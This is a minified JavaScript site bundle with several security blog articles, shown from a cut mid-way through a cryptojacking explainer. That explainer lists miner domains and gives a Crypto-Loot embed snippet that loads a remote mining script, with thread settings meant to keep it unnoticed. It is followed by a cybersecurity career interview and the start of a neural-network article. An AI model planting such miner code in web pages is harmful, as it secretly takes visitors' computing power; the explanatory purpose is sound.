2019 it has stopped working.\"]}),/*#__PURE__*/t(\"p\",{children:[\"However, there are other tools that are quite similar. Table 1 below, a scan made with \",/*#__PURE__*/e(a,{href:\"https://publicwww.com/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"publicWWW\"})}),\", shows the approximate number of websites using these tools.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Table 1. Quantity of websites per library\"}),/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/cryptojacking-malware/#2\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"[2]\"})})})]}),/*#__PURE__*/e(\"figure\",{className:\"framer-table-wrapper\",children:/*#__PURE__*/e(\"table\",{children:/*#__PURE__*/t(\"tbody\",{children:[/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"th\",{children:/*#__PURE__*/e(\"p\",{children:\"Website\"})}),/*#__PURE__*/e(\"th\",{children:/*#__PURE__*/e(\"p\",{children:\"Results\"})}),/*#__PURE__*/e(\"th\",{children:/*#__PURE__*/e(\"p\",{children:\"Query Parameter\"})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"Coinhive\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"30611\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"coinhive.min.js\"'})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"JSEcoin\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"1131\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"load.jsecoin.com\"'})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"Crypto-Loot\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"695\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"CryptoLoot.Anonymous\"'})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"Minr\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"324\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"minr.pw\", \"st.kjli.fi\", \"abc.pema.cl\", \"metrika.ron.si\", \"cdn.rove.cl\", \"host.d-ns.ga\", \"static.hk.rs\", \"hallaert.online\", \"cnt.statistic.date\", \"cdn.static-cnt.bid\"'})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"CoinImp\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"317\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/t(\"p\",{children:['\"',/*#__PURE__*/e(a,{href:\"http://www.coinimp.com/scripts/min.js\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"www.coinimp.com/scripts/min.js\"})}),'\"']})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"ProjectPoi (PPoi)\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"116\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"projectpoi.min\"'})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"AFMiner\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"46\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"afminer.com/code/miner.php\"'})})]}),/*#__PURE__*/t(\"tr\",{children:[/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"Papoto\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:\"42\"})}),/*#__PURE__*/e(\"td\",{children:/*#__PURE__*/e(\"p\",{children:'\"papoto.com/lib/papoto.js\"'})})]})]})})}),/*#__PURE__*/t(\"p\",{children:[\"In the following example, a test is shown using \",/*#__PURE__*/e(a,{href:\"http://crypto-loot/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Crypto Loot\"})}),\", a library that is replacing the previous Coinhive. It is very easy to implement in any application by inserting the following code.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"In-Browser mining script.\"})}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(r,{...t,code:'<script src=\"//statdynamic.com/lib/crypta.js\"></script>\\n<script>\\n var miner = new CRLT.Anonymous(\\'15837bc7758859e913c5ccc2d292a9f1e54775389d5\\',\\n { threads:4,throttle:0.2, coin: \"xmr\" }\\n );\\n miner.start();\\n</script>',language:\"JavaScript\"})})}),/*#__PURE__*/t(\"p\",{children:[\"When a user visits the application, the processing level quickly increases. The recommended thread value to make the script unnoticed is between 2-4. And the throttle that defines the maximum \",/*#__PURE__*/e(\"code\",{children:\"CPU\"}),\" usage is at 0.2 (80%), the full speed being 0.0, and the least recommended.\"]}),/*#__PURE__*/e(\"img\",{alt:\"CPU history\",className:\"framer-image\",height:\"243\",src:\"https://framerusercontent.com/images/GsvWw7nDD0rJr5QjU6tqMX925s.png\",srcSet:\"https://framerusercontent.com/images/GsvWw7nDD0rJr5QjU6tqMX925s.png?scale-down-to=512 512w,https://framerusercontent.com/images/GsvWw7nDD0rJr5QjU6tqMX925s.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/GsvWw7nDD0rJr5QjU6tqMX925s.png 1919w\",style:{aspectRatio:\"1919 / 486\"},width:\"959\"}),/*#__PURE__*/e(\"h6\",{children:\"CPU Usage while visiting a website with In-Browser mining script.\"}),/*#__PURE__*/t(\"p\",{children:[\"Collected earnings and processing power can be seen on the \",/*#__PURE__*/e(a,{href:\"https://crypto-loot.org/dashboard/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"dashboard\"})}),\" of the person who inserted the script.\"]}),/*#__PURE__*/e(\"h2\",{children:\"Conclusion\"}),/*#__PURE__*/t(\"p\",{children:[\"The use of services such as \",/*#__PURE__*/e(a,{href:\"http://crypto-loot/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Crypto Loot\"})}),\" can be legal. They are considered malware when used anonymously in user’s systems. It is our responsibility to inform users about what is happening and provide statistics to users on mined power.\"]}),/*#__PURE__*/e(\"p\",{children:\"In order for these mining methods to be legitimate and therefore, legal, users must receive a notification about the execution of these scripts, as well as the option to disable them and stop mining.\"}),/*#__PURE__*/t(\"p\",{children:[\"So far, there are few websites where the user is not actually informed of the use of these scripts. Here is where antivirus companies disagree. Some antivirus companies believe excessive \",/*#__PURE__*/e(\"code\",{children:\"CPU\"}),\" usage can cause intentional damage, while others believe there is no intention to harm an infected machine’s files; they just make the machine work a little slower.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Without a doubt, no one wants their machine to work slower, but with proper configuration of the scripts, you can achieve a website that generates profits without having to show annoying ads to visitors and without exceeding \",/*#__PURE__*/e(\"code\",{children:\"CPU\"}),\" usage.\"]}),/*#__PURE__*/e(\"h2\",{children:\"References\"}),/*#__PURE__*/t(\"ol\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"COINTELEGRAPH. \",/*#__PURE__*/e(a,{href:\"https://cointelegraph.com/news/monero-developers-consider-adopting-new-proof-of-work-algorithm-in-october\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Monero Developers Consider Adopting New Proof-of-Work Algorithm in October.\"})})]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"S. Eskandari, A. Leoutsarakos, T. Mursch and J. Clark (2018). \",/*#__PURE__*/e(a,{href:\"https://sci-hub.tw/https://ieeexplore.ieee.org/abstract/document/8406561\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"A first look at browser-based cryptojacking\"})}),\". \",/*#__PURE__*/e(\"em\",{children:\"2018 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW)\"}),\", 63.\"]})})]})]});export const richText9=/*#__PURE__*/e(o.Fragment,{children:/*#__PURE__*/e(\"p\",{children:\"We continue our conversation with Ricardo. We threw him a question that was the source of interesting debates at Fluid Attacks some time ago.\"})});export const richText10=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Should a company invest in security awareness training?\"})}),/*#__PURE__*/e(\"ol\",{style:{\"--list-style-type\":\"none\"},children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'\"You have two options: hiring people with the skills you need or supporting people to acquire those skills. People skilled enough in cybersecurity are scarce today. My stand here is that companies should invest in this; people should have a baseline knowledge of digital risks and cybersecurity. Educators should seek to create learning experiences. In my case, I feel like playing when I set myself to learn something new, and I think that has been crucial for advancing in my career. Instead of lectures (or only that), I think it’s better to create simulations where employees face what could be a real threat, like a phishing scam over email, telephone, or SMS. One of the strategies I think is the most effective is to make training interactive. For example, by putting people to solve challenges, making the training process look like a game.\"'})})}),/*#__PURE__*/t(\"p\",{children:[\"Fluid Attacks keeps learning through challenges, as Ricardo mentioned, starting at the hiring process. Take a look at our products, like asserts and \",/*#__PURE__*/e(a,{href:\"https://help.fluidattacks.com/portal/en/kb/criteria/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"Criteria\"})})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"In cybersecurity strategy, what should organizations start\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"and what should they stop doing?\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'\"Companies should migrate to the cloud if they haven’t done yet. You still get to know some companies that remain reluctant to make that decision arguing cybersecurity and information risks. But the reality is that public cloud providers have better practices compared to the typical organization. I would expect that debate to end soon.'})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Second, people should start learning to code. Everything is shifting towards coding. We have software-defined networks, infrastructure as code (IaC) and many other instances where using code makes everything so much more powerful and flexible. You can see how this is gaining traction in \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/cybersecurity-essentials/what-is-devops/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"DevOps\"})}),' roles in which a single person performs a combination of software development and infrastructure operations. I recommend starting with the Python programming language.\"']})})]}),/*#__PURE__*/t(\"p\",{children:[\"I'm pleased Ricardo pointed to the suggestion because cybersecurity will continue to be increasingly relevant in the global economy and coding is crucial. \",/*#__PURE__*/e(a,{href:\"https://www.inc.com/andrew-medal/everyone-on-the-planet-should-learn-to-code-heres-why-and-how.html\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Everyone should learn to code\"})}),\". For instance, we have seen invitations to \",/*#__PURE__*/e(a,{href:\"https://thenewmedic.com/why-how-learn-to-code/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"learn to program\"})}),\" in medicine. Likewise, the recognized statistician Nate Silver said \",/*#__PURE__*/e(a,{href:\"https://www.geekwire.com/2014/nate-silver/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"journalists should learn to code\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Now, concerning cybersecurity operations,\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"what should companies start and stop doing?\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['\"Often, people in cybersecurity are seen as the bad guys, as those who will disturb your peace by requesting fixes by pointing out errors. We have frictions because security is seen as a separate entity trying to show what is not OK. Cybersecurity professionals ',/*#__PURE__*/e(\"strong\",{children:\"should be those guiding businesses in how to do stuff in a secure way\"}),\" instead of being perceived as those saying \",/*#__PURE__*/e(\"em\",{children:\"‘it can’t be done that way’\"}),\".\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"DevOps teams solve some issues IT \",/*#__PURE__*/e(\"em\",{children:\"siloed\"}),\" teams usually have. What if DevOps teams go further by \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/cybersecurity-essentials/what-is-devsecops/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"including security capabilities\"})}),\" (DevSecOps)? One way to achieve that is to have security people working together with DevOps engineers. DevOps teams usually have some professionals more skilled in coding; others more experienced in infrastructure administration. \",/*#__PURE__*/e(a,{href:\"https://www.redhat.com/en/topics/devops/what-is-devsecops\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Security could be another ingredient to provide solutions within DevOps teams.\"})}),' Old-fashioned developers usually think they finish their job when an application is functionally running. However, from a business perspective, that’s not true if other aspects are still missing, like quality and security. Organizations should start reconfiguring their IT teams to create business resources covering everything in synergy: functionality, quality, and security.\"']})})]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What cybersecurity providers are doing well? What is not so great?\"})}),/*#__PURE__*/e(\"ol\",{style:{\"--list-style-type\":\"none\"},children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'\"I can only say Fluid Attacks is doing great stuff, by reinventing themselves. They started talking about IaC around four years ago mentioning the importance of organizations shifting towards it. Benefits are so clear that it’s unthinkable for me taking a different path. Here in Australia IaC is unnegotiable, it brings speed to service delivery, to development, to infrastructure deployment. Fluid Attacks is helping companies to automate the detection of weaknesses, working together with development, IT, and DevOps teams to infuse security the way I mentioned before. If a cybersecurity firm is not into IaC, they will soon lose the interesting customers.\"'})})}),/*#__PURE__*/t(\"p\",{children:[\"Indeed, Fluid Attacks has a DevOps approach. Want to know more? Visit our \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/continuous-hacking\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Continuous Hacking page\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Why do you think companies that know their weaknesses,\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"do not fix them or do it too late?\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"\\\"I'm pessimistic. Companies fix their weaknesses because they have to comply with some regulations. Most people don’t care that their software is unsafe. Those responsible for coding blame other people or wash their hands, knowing future issues will be fixed by a different developer down the line.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"When accountability disappears, businesses sooner or later are forced to face setbacks. Newer costs might appear by detecting issues late, and hence other troubles might demand valuable business resources. Another reason for that inaction is that we tend to be very optimistic, for example, saying \",/*#__PURE__*/e(\"em\",{children:\"'that happens in other companies, not here'\"}),\".\"]})})]}),/*#__PURE__*/t(\"p\",{children:[\"A CISO told us something very similar. Want to read about it? Click \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/sensible-cybersecurity/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"here\"})}),\".\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What do you think are relevant misconceptions in cybersecurity?\"})}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['\"A big misconception is that companies should protect primarily from individuals targeting your business: ',/*#__PURE__*/e(\"em\",{children:\"“the attacker”\"}),\", \",/*#__PURE__*/e(\"em\",{children:\"“the hacker”\"}),\", \",/*#__PURE__*/e(\"em\",{children:\"“the terrorist”\"}),\", etc. A real significant threat is malware which works automatically, not necessarily targeted to specific firms or people. It is more an entity trying to enter any small digital breach. You don’t need declared enemies to protect your information and digital assets. It is worrying that there is no concrete solution to malware and ransomware yet. The hope for some people are potential ML-based solutions \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/blog/hack-cern/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"like those tested at CERN\"})}),\" by our friend Andr\\xe9s.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Another misconception is the notion people have about our field. Cybersecurity is not about detecting weaknesses. It is the opposite: to build robust systems, less likely to have flaws.\"})})]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Security is a behavioral problem; you and I know that.\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"What do you think is the most critical challenge in cybersecurity\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"from a behavioral perspective, and why?\"})]}),/*#__PURE__*/t(\"ol\",{style:{\"--list-style-type\":\"none\"},children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:['\"I would say lack of curiosity or ',/*#__PURE__*/e(\"em\",{children:\"'critical thinking'\"}),\". I find this as a good countermeasure for simple mistakes we make that can have a huge impact, like getting caught by a phishing attack. There are other behaviors you and I have discussed like not fixing weaknesses, deploying unhardened servers or program without security practices.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:'Is hard for me to identify a broad reason why people behave as they do. But allow me to suggest this: a good way to move groups of people towards a better digital behavior is by making security more salient, by redefining security metrics. That’s like changing the incentives. Some security elements are not that visible, and security teams don’t enjoy a good reputation. So, by making security more salient, and signaling to some rewards from working towards well-thought security standards might be a trick to drive desirable behaviors.\"'})})]}),/*#__PURE__*/t(\"p\",{children:[\"We hope you liked this interview with Ricardo. We would be pleased to hear from you on these topics. Drops us a mail to \",/*#__PURE__*/e(a,{href:\"mailto:communications@fluidattacks.com\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"communications@fluidattacks.com\"})}),\" and engage with us!\"]}),/*#__PURE__*/e(\"p\",{children:\"To Ricardo, our gratitude!\"})]});export const richText11=/*#__PURE__*/e(o.Fragment,{children:/*#__PURE__*/e(\"p\",{children:\"Ricardo is a DevOps engineer in Australia. Previously, he worked for Fluid Attacks as a security analyst and instructor. He also spent a couple of years developing and maintaining an educational platform focused on coding and security, where students learned by solving programming challenges. He also had his feet in academia for a while: he holds an MSc in Engineering and finished his dissertation in Germany. As with previous interviewees, we reached him out to discuss cybersecurity.\"})});export const richText12=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/e(\"p\",{children:\"At first, he shared a bit of his experience in doing his MSc. To our surprise, he wasn’t that enthusiastic.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Why did you get frustrated about research?\"})}),/*#__PURE__*/e(\"p\",{children:\"The main issue was the friction and the amount of time you have to spend justifying ideas already validated by the industry. You end up allocating too much energy looking for the right paper or the proper journal to support the choice of your methods, which is probably already outdated compared to alternative sources of information. This is even more pronounced in cybersecurity.\"}),/*#__PURE__*/e(\"p\",{children:\"Another aspect was that the academic settings weren’t fun enough for me. I enjoy learning about technology because I can apply my skills to solve problems of increasing complexity. However, I found myself researching and writing papers without having enough time to play with the methods I have designed. Some people like to work on improving state of the art in methods and tools by designing rigorous experiments. Other people enjoy applying the best-known techniques to solve new problems. I discovered that I am in the latter group.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What can you say about academia and cybersecurity?\"})}),/*#__PURE__*/e(\"p\",{children:\"There is a vast gap between what industry needs and what is taught in colleges. We need more training in security skills. It isn’t that difficult to learn; nonetheless, you still get to know plenty of developers with no notion of effective security practices. That’s the reason I was attracted to work on an education platform some time ago.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What you just mentioned is paradoxical. Why this paradox?\"})}),/*#__PURE__*/e(\"p\",{children:\"Some people get into college, waiting to be fed with everything needed to succeed in a future job. That job probably doesn’t exist yet; that’s the paradox. Therefore, no matter how much knowledge you accumulate. At some point, you will need to learn more every day.\"}),/*#__PURE__*/e(\"p\",{children:\"For example, when I was an undergrad, all we know today as cloud computing wasn’t even mentioned, let alone how to protect those environments. In contrast, the industry was promoting these new ways of provisioning infrastructure, the tools were getting traction, and some companies were spreading knowledge and training people. But, this is the nature of our field. Computer science evolves so fast that academia is incapable of catching up. Self-teaching and self-learning are more widespread these days, and people are becoming more aware that they should keep learning.\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"How do you study?\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"How do you learn what you need to do in your job?\"})]}),/*#__PURE__*/e(\"p\",{children:\"What I’ve done is learning online through some of the many platforms available. I have earned some certifications that are being demanded by organizations, like AWS, GCP, or Kubernetes.\"}),/*#__PURE__*/e(\"p\",{children:\"Sometimes I pick a topic I don’t know, set a goal, and start browsing web resources. I train myself around specific tasks that interest me. Moreover, I also learn every day at work, solving new problems.\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Recently, I read somewhere that the most critical skill nowadays\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"for students is to know how to search in Google. You seem to nail it…\"})]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"​\"}),\"It isn’t a joke! You find people these days getting stuck in their jobs just because they don’t look for resources online. They might say that they need to speak to an expert. Also, these experts many times just google things out. It’s more of a mindset, rather than an inability.\"]}),/*#__PURE__*/e(\"p\",{children:\"I work building secure IT infrastructure using tools like Terraform and GCP. I like applying software development practices to the process of provisioning cloud resources, also known as Infrastructure as Code (IaC). You could say I am working on the defensive side of security; I have heard you’re doing cool stuff on the offensive side as well, aren’t you?\"}),/*#__PURE__*/t(\"p\",{children:[\"Security, as part of the development process, is essential to Fluid Attacks. We are proud to be working with this approach for several years now. Our \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/continuous-hacking\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Continuous Hacking\"})}),\" service relies on IaC to support our customers consistently and faster.\"]}),/*#__PURE__*/e(\"p\",{children:\"We turned into cybersecurity specifics, and like with the other people we have spoken with, we asked Ricardo about his opinion on machine learning (ML) and artificial intelligence (AI).\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"What is your opinion on the contributions from ML and AI to cybersecurity?\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"Do you find hype here?\"})]}),/*#__PURE__*/e(\"p\",{children:\"We’re in the hype phase according to the famous Gartner curve. But, indeed, there are several ML useful applications. I did some research on the topic years ago, and I concluded the field was in its early development. Around that time, some people even believed ML/AI would replace developers in a few years, for example. Something went wrong because I still got my paycheck last month (laughing). ML is a marvelous tool, and its development should continue. There are astonishing achievements, for instance, in health diagnosis, computers beating humans playing games, etc., with clear implications for society. However, those results are very domain-specific, and most problems in real life aren’t that well defined.\"}),/*#__PURE__*/e(\"img\",{alt:\"Hype cycle\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/eyHtDDjtSrTjQRs1lF3mAtIP04I.png\",srcSet:\"https://framerusercontent.com/images/eyHtDDjtSrTjQRs1lF3mAtIP04I.png?scale-down-to=512 512w,https://framerusercontent.com/images/eyHtDDjtSrTjQRs1lF3mAtIP04I.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/eyHtDDjtSrTjQRs1lF3mAtIP04I.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"h6\",{children:\"Hype Cycle for Emerging Technologies, 2017.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Do you think ML and AI would soon help in addressing digital threats better?\"})}),/*#__PURE__*/t(\"p\",{children:[\"To help yes, but not wholly address them. One of the most significant sources of vulnerabilities is what happens at the software design stage. Weaknesses created \",/*#__PURE__*/e(\"em\",{children:\"“by design”\"}),\". For example, in eliciting requirements, some design decisions lead to developing functionalities in an insecure way. That is more frequent than thought. And this is crazy: these \",/*#__PURE__*/e(\"em\",{children:\"“by-design”\"}),\" weaknesses are so simple to avoid, that for a competent cybersecurity professional is almost unthinkable to find them. The problems with these weaknesses, if not identified in a development phase, is that they might not be easily fixed when the software is already deployed.\"]}),/*#__PURE__*/e(\"p\",{children:\"Perhaps, someday, a software solution could detect automatically that kind of problems involving human judgment in the elicitation of requirements. If so, we’re far from that.\"}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Is this you just mentioned linked to the gap\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"in teaching secure software development in academia?\"}),\" \",/*#__PURE__*/e(\"strong\",{children:\"Do you think this can be solved?\"})]}),/*#__PURE__*/e(\"p\",{children:\"Of course, but it isn’t a particular challenge for universities; organizations, specifically development teams, should contribute too. Programmers must know this. But, other people involved in design processes, such as business analysts and software architects, should also get to know more about security. In the initial stages of development (requisites, domain analysis, design, etc.) it’s enormously helpful to include a cybersecurity guy that supervises and teaches people how to think about security and how to infuse it from the very beginning —thus avoiding potential setbacks in the future. Investing at that level is usually worth it.\"}),/*#__PURE__*/t(\"p\",{children:[\"The second part of this conversation will be published shortly. We hope you have enjoyed this post and we look forward to hearing from customers, partners, and friends. Do you want to share your thoughts? \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/contact-us\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Do get in touch with us!\"})}),\" Also, read about our \",/*#__PURE__*/e(a,{href:\"https://fluidattacks.com/solutions/application-security-posture-management\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,relValues:[],scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"ASPM solution\"})}),\", which helps teams implement security from the beginning of software development.\"]})]});export const richText13=/*#__PURE__*/t(o.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"Artificial Neural Networks (\",/*#__PURE__*/e(\"code\",{children:\"ANNs\"}),\") are certainly a 